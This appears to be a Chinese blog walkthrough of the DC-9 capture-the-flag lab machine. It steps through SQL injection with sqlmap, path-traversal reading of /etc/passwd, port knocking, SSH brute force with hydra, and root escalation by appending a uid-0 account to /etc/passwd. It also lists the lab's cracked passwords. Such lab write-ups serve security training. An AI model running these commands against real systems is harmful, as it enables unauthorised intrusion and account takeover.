- 1Kotlin withIndex
- 2FPGA硬件平台上基于Verilog实现的4路视频拼接技术_fpga 4路hdmi矩阵
- 33种python查看安装的所有库,然后将他们组合成一个pip命令_查看已安装的python库
- 4Flink HistoryServer配置(简单三步完成)_flink history server配置
- 5STC89C52RC数码管秒表程序编写_stc89c52rc数码管程序
- 6Android NotificationManager详解
- 7LLM记录-常见问题部分_llm为什么会出现复读机问题
- 8中国石油大学《客户关系管理》第三次在线作业_中国石油大学客户关系管理第一次在线作业
- 9尝鲜!最新 VitePress 1 版本 + Github action,自动部署个人静态站点 SSG_github action vits
- 10鸿蒙HarmonyOS实战-Stage模型(应用上下文Context)_鸿蒙 page 里获取 context(2)_鸿蒙 page里获取上下文
DC-9通关教程
赞
踩
一. 信息收集
1. 探测目标主机IP地址
arp-scan -l //查看网段
vm 编辑--查看虚拟网络编辑器,看到靶机的网段
网段是: 192.168.83.0
是c段网络
2. 全面检测目标IP
nmap -sP 192.168.83.1/24
靶机ip是:
192.168.83.154
攻击机的ip是:
192.168.83.136
3.扫描端口
端口和服务是对应关系的根据计算机网络的应用层协议
扫描端口
nmap -p 1-65535 -A 192.168.83.154
80端口--http服务打开
抓包发现有post上传
发现注入点
4.目录扫描
dirsearch -u 192.168.83.154 -e * -x 403 --random-agent
二. 渗透过程
1. SQL注入
知道注入点,接下来上sqlmap跑,POST传参search
a.爆库
sqlmap -u "http://192.168.83.154/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' --current-db
current database: 'Staff'
b.爆表
sqlmap -u "http://192.168.83.154/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' -D 'Staff' -tables
表: Users
c.爆字段
sqlmap -u "http://192.168.83.154/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' -D 'Staff' -T 'Users' -columns
d.爆字段内容
sqlmap -u "http://192.168.83.154/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' -D 'Staff' -T 'Users' -C 'Username,Password,UserID' -dump
有一位用户,还有密码,这密码一看就是md5,接下来找个在线网站解密
856f5de590ef37314e7c3bdf6f8a66dc
transorbital1
2.登录页面
登录页面成功后发现
就多了个Add Record界面,注意到下面有File does not exist,想到是程序引用或读取了一个不存在的文件才会回显这个,接着用参数fuzz测试一下,fuzz字典连接web渗透通用fuzz字典(小而精)
https://download.csdn.net/download/l2872253606/86267146
burpsuite抓包,构建payload
§§=../../../../../etc/passwd
字典爆破查看passwd的文件
上传的参数是file
参数名是file,存在任意文件读取漏洞
3. 端口敲门服务
考虑到ssh端口是关闭的,可能是开启了knock服务(参考端口敲门服务),利用文件包含确认一下,一般开启了knock服务就会存在/etc/knockd.conf文件
构造payload=0. "port knocking"
如字面意思,类似‘敲门’,只是这里敲的是‘端口’,而且需要按照顺序‘敲’端口。如果敲击规则匹配,则可以让防火墙实时更改策略。从而达到开关防火墙的目的。
果然有,开启ssh服务得依次敲击7469,8475,9842端口,利用netcat进行敲击
nc -z 192.168.83.154 7469 8475 9842
nmap -sS -p 22 192.168.83.154
敲击完后发现端口打开了
4. ssh爆破
无奈测试了一下admin登不上去,想起之前SQLmap跑出过一个users的数据库
存放网站用户信息的,我们去瞧一下
sqlmap -u "http://192.168.83.154/results.php" --level=5 --risk=3 --batch --method=POST --data='search=1' -D 'users' -dump
保存用户名和密码
接下来用九头蛇进行爆破
hydra -L users.txt -P passwd.txt ssh://192.168.83.154
chandlerb:UrAG0D!
joeyt:Passw0rd
janitor:Ilovepeepee
尝试登入发现janitor用户有东西
ls -la
cd .s*
cat *
添加密码
接下来用九头蛇进行爆破
hydra -L users.txt -P passwd.txt ssh://192.168.83.154
爆破出了一个新用户
fredf:B4-Tru3-001
sudo -l
5. 提权
接着到tmp目录新建一个文件
cd /tmp
echo 'hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash' > hack
再回到/opt/devstuff/dist/test目录,执行程序test,将hack的文件内容写入到/etc/passwd文件里面
cd /opt/devstuff/dist/test
sudo ./test /tmp/hack /etc/passw
可以看到hack用户已经添加到/etc/passwd文件里了,接下来切换用户
su hack
输入密码hack
